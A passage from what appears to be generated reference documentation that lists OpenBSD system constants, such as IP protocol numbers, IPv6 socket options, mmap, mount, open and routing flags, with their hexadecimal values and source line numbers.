0xf0000000 constant IN_CLASSD_NSHIFT (line 836) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 837) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_HOST (line 838) | IN_RFC3021_HOST = 0x1 constant IN_RFC3021_NET (line 839) | IN_RFC3021_NET = 0xfffffffe constant IN_RFC3021_NSHIFT (line 840) | IN_RFC3021_NSHIFT = 0x1f constant IPPROTO_AH (line 841) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 842) | IPPROTO_CARP = 0x70 constant IPPROTO_DIVERT (line 843) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 844) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 845) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 846) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 847) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 848) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 849) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 850) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 851) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 852) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 853) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 854) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 855) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 856) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 857) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 858) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 859) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 860) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 861) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 862) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 863) | IPPROTO_IPV6 = 0x29 constant IPPROTO_MAX (line 864) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 865) | IPPROTO_MAXID = 0x103 constant IPPROTO_MOBILE (line 866) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 867) | IPPROTO_MPLS = 0x89 constant IPPROTO_NONE (line 868) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 869) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 870) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 871) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 872) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 873) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 874) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 875) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 876) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 877) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 878) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 879) | IPPROTO_UDPLITE = 0x88 constant IPV6_AUTH_LEVEL (line 880) | IPV6_AUTH_LEVEL = 0x35 constant IPV6_AUTOFLOWLABEL (line 881) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_CHECKSUM (line 882) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 883) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 884) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 885) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 886) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 887) | IPV6_DSTOPTS = 0x32 constant IPV6_ESP_NETWORK_LEVEL (line 888) | IPV6_ESP_NETWORK_LEVEL = 0x37 constant IPV6_ESP_TRANS_LEVEL (line 889) | IPV6_ESP_TRANS_LEVEL = 0x36 constant IPV6_FAITH (line 890) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 891) | IPV6_FLOWINFO_MASK = 0xfffffff constant IPV6_FLOWLABEL_MASK (line 892) | IPV6_FLOWLABEL_MASK = 0xfffff constant IPV6_FRAGTTL (line 893) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 894) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 895) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 896) | IPV6_HOPOPTS = 0x31 constant IPV6_IPCOMP_LEVEL (line 897) | IPV6_IPCOMP_LEVEL = 0x3c constant IPV6_JOIN_GROUP (line 898) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 899) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 900) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 901) | IPV6_MAXPACKET = 0xffff constant IPV6_MINHOPCOUNT (line 902) | IPV6_MINHOPCOUNT = 0x41 constant IPV6_MMTU (line 903) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 904) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 905) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 906) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 907) | IPV6_NEXTHOP = 0x30 constant IPV6_OPTIONS (line 908) | IPV6_OPTIONS = 0x1 constant IPV6_PATHMTU (line 909) | IPV6_PATHMTU = 0x2c constant IPV6_PIPEX (line 910) | IPV6_PIPEX = 0x3f constant IPV6_PKTINFO (line 911) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 912) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 913) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 914) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 915) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 916) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVDSTPORT (line 917) | IPV6_RECVDSTPORT = 0x40 constant IPV6_RECVHOPLIMIT (line 918) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 919) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 920) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 921) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 922) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 923) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTABLE (line 924) | IPV6_RTABLE = 0x1021 constant IPV6_RTHDR (line 925) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 926) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 927) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 928) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 929) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 930) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 931) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 932) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 933) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 934) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 935) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 936) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 937) | IP_ADD_MEMBERSHIP = 0xc constant IP_AUTH_LEVEL (line 938) | IP_AUTH_LEVEL = 0x14 constant IP_DEFAULT_MULTICAST_LOOP (line 939) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 940) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 941) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 942) | IP_DROP_MEMBERSHIP = 0xd constant IP_ESP_NETWORK_LEVEL (line 943) | IP_ESP_NETWORK_LEVEL = 0x16 constant IP_ESP_TRANS_LEVEL (line 944) | IP_ESP_TRANS_LEVEL = 0x15 constant IP_HDRINCL (line 945) | IP_HDRINCL = 0x2 constant IP_IPCOMP_LEVEL (line 946) | IP_IPCOMP_LEVEL = 0x1d constant IP_IPDEFTTL (line 947) | IP_IPDEFTTL = 0x25 constant IP_IPSECFLOWINFO (line 948) | IP_IPSECFLOWINFO = 0x24 constant IP_IPSEC_LOCAL_AUTH (line 949) | IP_IPSEC_LOCAL_AUTH = 0x1b constant IP_IPSEC_LOCAL_CRED (line 950) | IP_IPSEC_LOCAL_CRED = 0x19 constant IP_IPSEC_LOCAL_ID (line 951) | IP_IPSEC_LOCAL_ID = 0x17 constant IP_IPSEC_REMOTE_AUTH (line 952) | IP_IPSEC_REMOTE_AUTH = 0x1c constant IP_IPSEC_REMOTE_CRED (line 953) | IP_IPSEC_REMOTE_CRED = 0x1a constant IP_IPSEC_REMOTE_ID (line 954) | IP_IPSEC_REMOTE_ID = 0x18 constant IP_MAXPACKET (line 955) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 956) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x20 constant IP_MIN_MEMBERSHIPS (line 959) | IP_MIN_MEMBERSHIPS = 0xf constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 964) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 965) | IP_OPTIONS = 0x1 constant IP_PIPEX (line 966) | IP_PIPEX = 0x22 constant IP_PORTRANGE (line 967) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 968) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 969) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 970) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 971) | IP_RECVDSTADDR = 0x7 constant IP_RECVDSTPORT (line 972) | IP_RECVDSTPORT = 0x21 constant IP_RECVIF (line 973) | IP_RECVIF = 0x1e constant IP_RECVOPTS (line 974) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 975) | IP_RECVRETOPTS = 0x6 constant IP_RECVRTABLE (line 976) | IP_RECVRTABLE = 0x23 constant IP_RECVTTL (line 977) | IP_RECVTTL = 0x1f constant IP_RETOPTS (line 978) | IP_RETOPTS = 0x8 constant IP_RF (line 979) | IP_RF = 0x8000 constant IP_RTABLE (line 980) | IP_RTABLE = 0x1021 constant IP_SENDSRCADDR (line 981) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 982) | IP_TOS = 0x3 constant IP_TTL (line 983) | IP_TTL = 0x4 constant ISIG (line 984) | ISIG = 0x80 constant ISTRIP (line 985) | ISTRIP = 0x20 constant ITIMER_PROF (line 986) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 987) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 988) | ITIMER_VIRTUAL = 0x1 constant IUCLC (line 989) | IUCLC = 0x1000 constant IXANY (line 990) | IXANY = 0x800 constant IXOFF (line 991) | IXOFF = 0x400 constant IXON (line 992) | IXON = 0x200 constant KERN_HOSTNAME (line 993) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 994) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 995) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 996) | KERN_VERSION = 0x4 constant LCNT_OVERLOAD_FLUSH (line 997) | LCNT_OVERLOAD_FLUSH = 0x6 constant LOCK_EX (line 998) | LOCK_EX = 0x2 constant LOCK_NB (line 999) | LOCK_NB = 0x4 constant LOCK_SH (line 1000) | LOCK_SH = 0x1 constant LOCK_UN (line 1001) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 1002) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1003) | MADV_FREE = 0x6 constant MADV_NORMAL (line 1004) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 1005) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1006) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 1007) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 1008) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 1009) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1010) | MAP_ANONYMOUS = 0x1000 constant MAP_CONCEAL (line 1011) | MAP_CONCEAL = 0x8000 constant MAP_COPY (line 1012) | MAP_COPY = 0x2 constant MAP_FILE (line 1013) | MAP_FILE = 0x0 constant MAP_FIXED (line 1014) | MAP_FIXED = 0x10 constant MAP_FLAGMASK (line 1015) | MAP_FLAGMASK = 0xfff7 constant MAP_HASSEMAPHORE (line 1016) | MAP_HASSEMAPHORE = 0x0 constant MAP_INHERIT (line 1017) | MAP_INHERIT = 0x0 constant MAP_INHERIT_COPY (line 1018) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_NONE (line 1019) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1020) | MAP_INHERIT_SHARE = 0x0 constant MAP_INHERIT_ZERO (line 1021) | MAP_INHERIT_ZERO = 0x3 constant MAP_NOEXTEND (line 1022) | MAP_NOEXTEND = 0x0 constant MAP_NORESERVE (line 1023) | MAP_NORESERVE = 0x0 constant MAP_PRIVATE (line 1024) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1025) | MAP_RENAME = 0x0 constant MAP_SHARED (line 1026) | MAP_SHARED = 0x1 constant MAP_STACK (line 1027) | MAP_STACK = 0x4000 constant MAP_TRYFIXED (line 1028) | MAP_TRYFIXED = 0x0 constant MCL_CURRENT (line 1029) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1030) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1031) | MNT_ASYNC = 0x40 constant MNT_DEFEXPORTED (line 1032) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1033) | MNT_DELEXPORT = 0x20000 constant MNT_DOOMED (line 1034) | MNT_DOOMED = 0x8000000 constant MNT_EXPORTANON (line 1035) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1036) | MNT_EXPORTED = 0x100 constant MNT_EXRDONLY (line 1037) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1038) | MNT_FORCE = 0x80000 constant MNT_LAZY (line 1039) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1040) | MNT_LOCAL = 0x1000 constant MNT_NOATIME (line 1041) | MNT_NOATIME = 0x8000 constant MNT_NODEV (line 1042) | MNT_NODEV = 0x10 constant MNT_NOEXEC (line 1043) | MNT_NOEXEC = 0x4 constant MNT_NOPERM (line 1044) | MNT_NOPERM = 0x20 constant MNT_NOSUID (line 1045) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1046) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1047) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1048) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1049) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1050) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1051) | MNT_SOFTDEP = 0x4000000 constant MNT_STALLED (line 1052) | MNT_STALLED = 0x100000 constant MNT_SWAPPABLE (line 1053) | MNT_SWAPPABLE = 0x200000 constant MNT_SYNCHRONOUS (line 1054) | MNT_SYNCHRONOUS = 0x2 constant MNT_UPDATE (line 1055) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1056) | MNT_VISFLAGMASK = 0x400ffff constant MNT_WAIT (line 1057) | MNT_WAIT = 0x1 constant MNT_WANTRDWR (line 1058) | MNT_WANTRDWR = 0x2000000 constant MNT_WXALLOWED (line 1059) | MNT_WXALLOWED = 0x800 constant MOUNT_AFS (line 1060) | MOUNT_AFS = "afs" constant MOUNT_CD9660 (line 1061) | MOUNT_CD9660 = "cd9660" constant MOUNT_EXT2FS (line 1062) | MOUNT_EXT2FS = "ext2fs" constant MOUNT_FFS (line 1063) | MOUNT_FFS = "ffs" constant MOUNT_FUSEFS (line 1064) | MOUNT_FUSEFS = "fuse" constant MOUNT_MFS (line 1065) | MOUNT_MFS = "mfs" constant MOUNT_MSDOS (line 1066) | MOUNT_MSDOS = "msdos" constant MOUNT_NCPFS (line 1067) | MOUNT_NCPFS = "ncpfs" constant MOUNT_NFS (line 1068) | MOUNT_NFS = "nfs" constant MOUNT_NTFS (line 1069) | MOUNT_NTFS = "ntfs" constant MOUNT_TMPFS (line 1070) | MOUNT_TMPFS = "tmpfs" constant MOUNT_UDF (line 1071) | MOUNT_UDF = "udf" constant MOUNT_UFS (line 1072) | MOUNT_UFS = "ffs" constant MSG_BCAST (line 1073) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1074) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CTRUNC (line 1075) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1076) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1077) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1078) | MSG_EOR = 0x8 constant MSG_MCAST (line 1079) | MSG_MCAST = 0x200 constant MSG_NOSIGNAL (line 1080) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1081) | MSG_OOB = 0x1 constant MSG_PEEK (line 1082) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1083) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1084) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1085) | MSG_WAITFORONE = 0x1000 constant MS_ASYNC (line 1086) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1087) | MS_INVALIDATE = 0x4 constant MS_SYNC (line 1088) | MS_SYNC = 0x2 constant NAME_MAX (line 1089) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1090) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1091) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1092) | NET_RT_IFLIST = 0x3 constant NET_RT_IFNAMES (line 1093) | NET_RT_IFNAMES = 0x6 constant NET_RT_MAXID (line 1094) | NET_RT_MAXID = 0x8 constant NET_RT_SOURCE (line 1095) | NET_RT_SOURCE = 0x7 constant NET_RT_STATS (line 1096) | NET_RT_STATS = 0x4 constant NET_RT_TABLE (line 1097) | NET_RT_TABLE = 0x5 constant NFDBITS (line 1098) | NFDBITS = 0x20 constant NOFLSH (line 1099) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1100) | NOKERNINFO = 0x2000000 constant NOTE_ATTRIB (line 1101) | NOTE_ATTRIB = 0x8 constant NOTE_CHANGE (line 1102) | NOTE_CHANGE = 0x1 constant NOTE_CHILD (line 1103) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1104) | NOTE_DELETE = 0x1 constant NOTE_EOF (line 1105) | NOTE_EOF = 0x2 constant NOTE_EXEC (line 1106) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1107) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1108) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1109) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1110) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1111) | NOTE_LOWAT = 0x1 constant NOTE_OOB (line 1112) | NOTE_OOB = 0x4 constant NOTE_PCTRLMASK (line 1113) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1114) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1115) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1116) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1117) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1118) | NOTE_TRACKERR = 0x2 constant NOTE_TRUNCATE (line 1119) | NOTE_TRUNCATE = 0x80 constant NOTE_WRITE (line 1120) | NOTE_WRITE = 0x2 constant OCRNL (line 1121) | OCRNL = 0x10 constant OLCUC (line 1122) | OLCUC = 0x20 constant ONLCR (line 1123) | ONLCR = 0x2 constant ONLRET (line 1124) | ONLRET = 0x80 constant ONOCR (line 1125) | ONOCR = 0x40 constant ONOEOT (line 1126) | ONOEOT = 0x8 constant OPOST (line 1127) | OPOST = 0x1 constant OXTABS (line 1128) | OXTABS = 0x4 constant O_ACCMODE (line 1129) | O_ACCMODE = 0x3 constant O_APPEND (line 1130) | O_APPEND = 0x8 constant O_ASYNC (line 1131) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1132) | O_CLOEXEC = 0x10000 constant O_CREAT (line 1133) | O_CREAT = 0x200 constant O_DIRECTORY (line 1134) | O_DIRECTORY = 0x20000 constant O_DSYNC (line 1135) | O_DSYNC = 0x80 constant O_EXCL (line 1136) | O_EXCL = 0x800 constant O_EXLOCK (line 1137) | O_EXLOCK = 0x20 constant O_FSYNC (line 1138) | O_FSYNC = 0x80 constant O_NDELAY (line 1139) | O_NDELAY = 0x4 constant O_NOCTTY (line 1140) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1141) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1142) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1143) | O_RDONLY = 0x0 constant O_RDWR (line 1144) | O_RDWR = 0x2 constant O_RSYNC (line 1145) | O_RSYNC = 0x80 constant O_SHLOCK (line 1146) | O_SHLOCK = 0x10 constant O_SYNC (line 1147) | O_SYNC = 0x80 constant O_TRUNC (line 1148) | O_TRUNC = 0x400 constant O_WRONLY (line 1149) | O_WRONLY = 0x1 constant PARENB (line 1150) | PARENB = 0x1000 constant PARMRK (line 1151) | PARMRK = 0x8 constant PARODD (line 1152) | PARODD = 0x2000 constant PENDIN (line 1153) | PENDIN = 0x20000000 constant PF_FLUSH (line 1154) | PF_FLUSH = 0x1 constant PRIO_PGRP (line 1155) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1156) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1157) | PRIO_USER = 0x2 constant PROT_EXEC (line 1158) | PROT_EXEC = 0x4 constant PROT_NONE (line 1159) | PROT_NONE = 0x0 constant PROT_READ (line 1160) | PROT_READ = 0x1 constant PROT_WRITE (line 1161) | PROT_WRITE = 0x2 constant RLIMIT_CORE (line 1162) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1163) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1164) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1165) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1166) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1167) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1168) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1169) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1170) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1171) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1172) | RTAX_AUTHOR = 0x6 constant RTAX_BFD (line 1173) | RTAX_BFD = 0xb constant RTAX_BRD (line 1174) | RTAX_BRD = 0x7 constant RTAX_DNS (line 1175) | RTAX_DNS = 0xc constant RTAX_DST (line 1176) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1177) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1178) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1179) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1180) | RTAX_IFP = 0x4 constant RTAX_LABEL (line 1181) | RTAX_LABEL = 0xa constant RTAX_MAX (line 1182) | RTAX_MAX = 0xf constant RTAX_NETMASK (line 1183) | RTAX_NETMASK = 0x2 constant RTAX_SEARCH (line 1184) | RTAX_SEARCH = 0xe constant RTAX_SRC (line 1185) | RTAX_SRC = 0x8 constant RTAX_SRCMASK (line 1186) | RTAX_SRCMASK = 0x9 constant RTAX_STATIC (line 1187) | RTAX_STATIC = 0xd constant RTA_AUTHOR (line 1188) | RTA_AUTHOR = 0x40 constant RTA_BFD (line 1189) | RTA_BFD = 0x800 constant RTA_BRD (line 1190) | RTA_BRD = 0x80 constant RTA_DNS (line 1191) | RTA_DNS = 0x1000 constant RTA_DST (line 1192) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1193) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1194) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1195) | RTA_IFA = 0x20 constant RTA_IFP (line 1196) | RTA_IFP = 0x10 constant RTA_LABEL (line 1197) | RTA_LABEL = 0x400 constant RTA_NETMASK (line 1198) | RTA_NETMASK = 0x4 constant RTA_SEARCH (line 1199) | RTA_SEARCH = 0x4000 constant RTA_SRC (line 1200) | RTA_SRC = 0x100 constant RTA_SRCMASK (line 1201) | RTA_SRCMASK = 0x200 constant RTA_STATIC (line 1202) | RTA_STATIC = 0x2000 constant RTF_ANNOUNCE (line 1203) | RTF_ANNOUNCE = 0x4000 constant RTF_BFD (line 1204) | RTF_BFD = 0x1000000 constant RTF_BLACKHOLE (line 1205) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1206) | RTF_BROADCAST = 0x400000 constant RTF_CACHED (line 1207) | RTF_CACHED = 0x20000 constant RTF_CLONED (line 1208) | RTF_CLONED = 0x10000 constant RTF_CLONING (line 1209) | RTF_CLONING = 0x100 constant RTF_CONNECTED (line 1210) | RTF_CONNECTED = 0x800000 constant RTF_DONE (line 1211) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1212) | RTF_DYNAMIC = 0x10 constant RTF_FMASK (line 1213) | RTF_FMASK = 0x110fc08 constant RTF_GATEWAY (line 1214) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 1215) | RTF_HOST = 0x4 constant RTF_LLINFO (line 1216) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1217) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1218) | RTF_MODIFIED = 0x20 constant RTF_MPATH (line 1219) | RTF_MPATH = 0x40000 constant RTF_MPLS (line 1220) | RTF_MPLS = 0x100000 constant RTF_MULTICAST (line 1221) | RTF_MULTICAST = 0x200 constant RTF_PERMANENT_ARP (line 1222) | RTF_PERMANENT_ARP = 0x2000 constant RTF_PROTO1 (line 1223) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1224) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1225) | RTF_PROTO3 = 0x2000 constant RTF_REJECT (line 1226) | RTF_REJECT = 0x8 constant RTF_STATIC (line 1227) | RTF_STATIC = 0x800 constant RTF_UP (line 1228) | RTF_UP = 0x1 constant RTF_USETRAILERS (line 1229) | RTF_USETRAILERS = 0x8000 constant RTM_80211INFO (line 1230) | RTM_80211INFO = 0x15 constant RTM_ADD (line 1231) | RTM_ADD = 0x1 constant RTM_BFD (line 1232) | RTM_BFD = 0x12 constant RTM_CHANGE (line 1233) | RTM_CHANGE = 0x3 constant RTM_CHGADDRATTR (line 1234) | RTM_CHGADDRATTR = 0x14 constant RTM_DELADDR (line 1235) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1236) | RTM_DELETE = 0x2 constant RTM_DESYNC (line 1237) | RTM_DESYNC = 0x10 constant RTM_GET (line 1238) | RTM_GET = 0x4 constant RTM_IFANNOUNCE (line 1239) | RTM_IFANNOUNCE = 0xf constant RTM_IFINFO (line 1240) | RTM_IFINFO = 0xe constant RTM_INVALIDATE (line 1241) | RTM_INVALIDATE = 0x11 constant RTM_LOSING (line 1242) | RTM_LOSING = 0x5 constant RTM_MAXSIZE (line 1243) | RTM_MAXSIZE = 0x800 constant RTM_MISS (line 1244) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1245) | RTM_NEWADDR = 0xc constant RTM_PROPOSAL (line 1246) | RTM_PROPOSAL = 0x13 constant RTM_REDIRECT (line 1247) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1248) | RTM_RESOLVE = 0xb constant RTM_SOURCE (line 1249) | RTM_SOURCE = 0x16 constant RTM_VERSION (line 1250) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1251) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1252) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1253) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1254) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1255) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1256) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1257) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1258) | 